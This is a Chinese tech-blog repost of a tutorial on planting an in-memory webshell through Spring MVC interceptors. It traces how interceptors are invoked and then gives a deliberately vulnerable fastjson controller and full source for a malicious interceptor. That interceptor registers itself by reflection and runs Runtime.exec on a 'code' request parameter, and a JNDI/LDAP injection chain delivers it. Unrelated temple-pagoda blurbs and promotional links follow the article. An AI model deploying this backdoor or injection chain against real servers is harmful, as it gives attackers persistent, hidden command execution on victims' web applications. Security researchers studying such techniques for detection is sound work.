搜索

想不到!Spring MVC 拦截器也有漏洞。。

Java技术栈

共 6529字,需浏览 14分钟

 · 2022-01-23

点击关注公众号,Java干货及时送达

1 基础拦截器和调用流程的探索

学习、探索和实现过程很多都基于大佬的文章:

https://landgrey.me/blog/19/

https://landgrey.me/blog/12/

1.1 基础拦截器

前不久实现cotroller内存马能添加冰蝎代码后,又想到spring mvc的拦截器应该也可以用于注入内存马,目前的关键点在于找到拦截器是如何被触发以及如何动态添加拦截器

首先来写个正常的拦截器TestInterceptor类,并添加xml配置

然后启动程序,在访问/home/index,并添加code参数弹个计算器

1.2 探索拦截器的调用链

断点打在TestInterceptor类中,调试看看调用链

preHandle:31, TestInterceptor (bitterz.interceptors)
applyPreHandle:134, HandlerExecutionChain (org.springframework.web.servlet)
doDispatch:956, DispatcherServlet (org.springframework.web.servlet)
doService:895, DispatcherServlet (org.springframework.web.servlet)
processRequest:967, FrameworkServlet (org.springframework.web.servlet)
doGet:858, FrameworkServlet (org.springframework.web.servlet)
service:621, HttpServlet (javax.servlet.http)
service:843, FrameworkServlet (org.springframework.web.servlet)
service:728, HttpServlet (javax.servlet.http)
internalDoFilter:305, ApplicationFilterChain (org.apache.catalina.core)
doFilter:210, ApplicationFilterChain (org.apache.catalina.core)
invoke:222, StandardWrapperValve (org.apache.catalina.core)
invoke:123, StandardContextValve (org.apache.catalina.core)
invoke:472, AuthenticatorBase (org.apache.catalina.authenticator)
invoke:171, StandardHostValve (org.apache.catalina.core)
invoke:99, ErrorReportValve (org.apache.catalina.valves)
invoke:947, AccessLogValve (org.apache.catalina.valves)
invoke:118, StandardEngineValve (org.apache.catalina.core)
service:408, CoyoteAdapter (org.apache.catalina.connector)
process:1009, AbstractHttp11Processor (org.apache.coyote.http11)
process:589, AbstractProtocol$AbstractConnectionHandler (org.apache.coyote)
run:312, JIoEndpoint$SocketProcessor (org.apache.tomcat.util.net)
runWorker:1142, ThreadPoolExecutor (java.util.concurrent)
run:617, ThreadPoolExecutor$Worker (java.util.concurrent)
run:745, Thread (java.lang)

推荐一个 Spring Boot 基础教程及实战示例:
https://github.com/javastacks/spring-boot-best-practice

关键点在doDispatch方法,先通过getHandler方法获取了mappedHandler对象

在后方调用mappedHandler的applyPreHandler方法

这个方法中就是依次调用每个interceptor实例的preHandle方法,实际上就进入了前面写好的TestInterceptor类的preHandle方法中。

1.3 探索拦截器是如何被添加的

跟踪mappedHandler的获取过程,先是调用了org.springframework.web.servlet.DispatcherServlet中的getHandler方法

跟进getHandler方法,这里会遍历this.handlerMappings,获取HandlerMapping的实例,再调用getHandler方法

这里断点跟进getHandler函数处,会发现实际上调用了org.springframework.web.servlet.handler.AbstractHandlerMapping类中的getHandler方法。最新面试题整理好了,点击Java面试库小程序在线刷题。

再跟进getHandlerExecutionChain方法,发现其中会遍历adaptedInterceptors这数组,并判断获取的interceptor实例是不是MappedInterceptor类的实例对象,而MappedInterceptor类就是对拦截器HandlerInterceptor接口的实现,所以前面定义的TestInterceptor自然会被加入chain中并返回

至此,拦截器的加载和调用流程就清楚了, 动态添加拦截器的话,只需要在org.springframework.web.servlet.handler.AbstractHandlerMapping类的实例对象的adaptedInterceptors数组中添加恶意interceptor实例对象即可!

那么关键就在于找到org.springframework.web.servlet.handler.AbstractHandlerMapping类的实例对象,CTRL+ALT+B找到所有AbstractHandlerMapping的子类,并在beanFactory的beanDefinitionNames中找到它的实例org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping

因此可以通过context.getBean("org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping")获取该对象,再反射获取其中的adaptedInterceptors属性,并添加恶意interceptor实例对象即可完成内存马的注入。

点击关注公众号,Java干货及时送达

2 实践

首先用springmvc 写了一个包含fastjson的反序列化漏洞的controller.

推荐一个 Spring Boot 基础教程及实战示例:https://github.com/javastacks/spring-boot-best-practice

    @RequestMapping(value = "/postjson", method = RequestMethod.GET)
    public String postJson(HttpServletRequest request){
        return "postjson";
    }

    @RequestMapping(value = "/readjson", method = RequestMethod.POST)
    public String readJson(HttpServletRequest request){
        String jsonStr = request.getParameter("jsonstr");
        System.out.println(jsonStr);  // 在控制台输出jsonStr

        Object obj = JSON.parseObject(jsonStr);
        System.out.println(obj); // 等同于数据操作

        return "readjson";  // 返回一个页面给用户
    }

访问/postjson,并提交payload,而payload会发送到/readjson处,被fastjson反序列化,触发JNDI注入造成内存马的注入。首先开启LDAP和python服务,编译恶意Interceptor类

恶意Interceptor类源代码如下

import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.HandlerInterceptorAdapter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class TestInterceptor extends HandlerInterceptorAdapter {
    public TestInterceptor() throws NoSuchFieldException, IllegalAccessException, InstantiationException {
        // 获取context
        WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT"0);
        // 从context中获取AbstractHandlerMapping的实例对象
        org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean("org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping");
        // 反射获取adaptedInterceptors属性
        java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
        field.setAccessible(true);
        java.util.ArrayList adaptedInterceptors = (java.util.ArrayList)field.get(abstractHandlerMapping);
        // 避免重复添加
        for (int i = adaptedInterceptors.size() - 1; i > 0; i--) {
            if (adaptedInterceptors.get(i) instanceof TestInterceptor) {
                System.out.println("已经添加过TestInterceptor实例了");
                return;
            }
        }
        TestInterceptor aaa = new TestInterceptor("aaa");  // 避免进入实例创建的死循环
        adaptedInterceptors.add(aaa);  //  添加全局interceptor
    }

    private TestInterceptor(String aaa){}

    @Override
    public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
        String code = request.getParameter("code");
        // 不干扰正常业务逻辑
        if (code != null) {
            java.lang.Runtime.getRuntime().exec(code);
            return true;
        }
        else {
            return true;
        }}}
这里提交两次payload是为了确认:不重复添加interceptor的代码生效了
可见Interceptor内存马已经注入了,现在弹个计算器验证一下
作者:bitterz
地址:https://www.cnblogs.com/bitterz/







微信官宣:一大波新年红包封面来了!
2021 年发生的 10 件技术大事!!
23 种设计模式实战(很全)
Log4j2 漏洞之 JNDI 到底是个什么鬼?
炸了!Log4j2 再爆漏洞。。
劲爆!Java 协程要来了
重磅官宣:Redis 对象映射框架来了!!
推荐一款代码神器,代码量至少省一半!
程序员精通各种技术体系,45岁求职难!
重磅!Spring Boot 2.6 正式发布
Spring Boot 学习笔记,这个太全了!



关注Java技术栈看更多干货


获取 Spring Boot 实战笔记!

                
浏览
                    41
点赞
    
评论
    
收藏
    
分享
        
手机扫一扫分享
举报
评论
图片
表情
推荐
丹霞寺塔林

 丹霞寺塔林,位于河南省南阳市南召县留山镇马窝村,是历经元、明、清朝的古建筑。

 丹霞寺四周现存元明清三代砖石塔14座,为丹霞寺和尚墓地。元代塔6座,均为六角形密格式实心砖塔;明代塔3座,均为方形砖塔;清代石塔5座,均为六角形楼阁式石塔。部分塔保存有塔铭,其中一座上刻有“般若波罗密多心经”经文。
丹霞寺塔林
0
丹霞寺塔林
丹霞寺塔林
0
真如寺大殿
真如寺,俗称大寺、大庙,位于上海市普陀区真如镇街道兰溪路399号。南宋嘉定年间(1208~1224年),僧永安在官场(今宝山区大场镇附近)改建后名真如院,元延祐七年(1320年),僧人妙心从宝山大场旧
真如寺大殿
0
真如寺大殿

 真如寺,俗称大寺、大庙,位于上海市普陀区真如镇街道兰溪路399号。南宋嘉定年间(1208~1224年),僧永安在官场(今宝山区大场镇附近)改建后名真如院,元延祐七年(1320年),僧人妙心从宝山大场旧址移建现址。面积达158平方米。

 真如寺大殿,平面基本呈正方形,东西面阔3间,总宽13.4米
真如寺大殿
0
宿真如寺
宿真如寺 迢迢修岭踏朱红,林?深蔵古?宫。一阁摩云鏁宸翰,神光长照大江东。 白帝孤城在何许,遥想西风
轻识古籍
0
武乡真如寺
武乡真如寺
0
武乡真如寺

 武乡真如寺,原名真如院,位于山西省长治市武乡县韩北乡土河村,是元朝至清朝时期的古建筑遗址。

 武乡真如坐北朝南,现存一进院落。现存大殿为元代建筑,南殿为明代建筑,其余则为清代所建。寺院由南至北依次为:南殿、大殿,西侧廊房,东侧仅存廊房遗址。大殿面阔五间,进深五椽,单檐悬山顶,筒板瓦屋面,琉璃脊
武乡真如寺
0
真如寺石塔
真如寺石塔
0
真如寺石塔

 真如寺石塔,也叫七如来塔,位于浙江省温州市乐清市北白象镇磐石重石村真如寺内,面对山门平行而立,建于唐文德元年(888年)。

 真如寺石塔原有七座,七塔除雕饰略有不同外,形制几乎完全相同。塔高5.16米,单檐,除雕饰略有不同外,构造、形制一致。基台平面六边形,束腰六面浮雕卷草纹。真如寺石塔是江南
真如寺石塔
0
栖岩寺塔林

 栖岩寺塔林,位于山西省运城市永济市中条山顶栖岩寺内,属唐朝至清朝时期塔林。

 栖岩寺始建于北周时期,初名“灵居寺”,隋仁寿元年(601年),改名“栖岩寺”。现存古塔26座。其中唐、五代、宋塔各1座,元代塔2座,明、清塔21座。除宋塔外,余皆僧人墓塔。栖岩寺塔林集唐、宋、元、明四代墓塔于一地,建
栖岩寺塔林
0
点赞
    
评论
    
收藏
    
分享
        
手机扫一扫分享
举报